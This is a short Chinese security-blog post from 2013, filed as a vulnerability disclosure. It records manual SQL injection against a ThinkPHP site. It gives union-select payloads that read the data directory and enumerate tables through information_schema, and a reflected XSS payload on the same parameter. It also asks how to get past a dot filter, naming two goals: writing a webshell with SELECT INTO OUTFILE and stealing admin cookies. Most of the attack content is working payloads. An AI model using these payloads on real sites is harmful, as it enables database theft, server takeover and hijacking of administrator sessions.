thinkphp框架下mysql注入

作者:tnt1200

Wamp环境,用thinkphp框架制作,手工检测发现一个注入点。

/content/117 and 1=2 union select @@datadir,2,3,4,5,6

20130123145103

 

这个注入点同时还是一个反射型xss,id值被写入到了内联js里。

20130123145325

 

接着提交
and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=(hex值)
返回空白,查看源代码发现”.”之后的语句被截断了。

20130123145408

 

现在有几个思路,求指点
1.构造特殊语句,使语句中不出现”.”。
2.通过Select into outfile导出webshell。但由于框架问题”/”和””都被认为是目录。
3.构造xss获取管理员cookies。

eg:/content/117;alert(document.cookie)

 

本文固定链接: https://www.unhonker.com/bug/924.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年01月23日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: thinkphp框架下mysql注入 | 90' s Blog|关注网络信息安全
关键字:

thinkphp框架下mysql注入:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!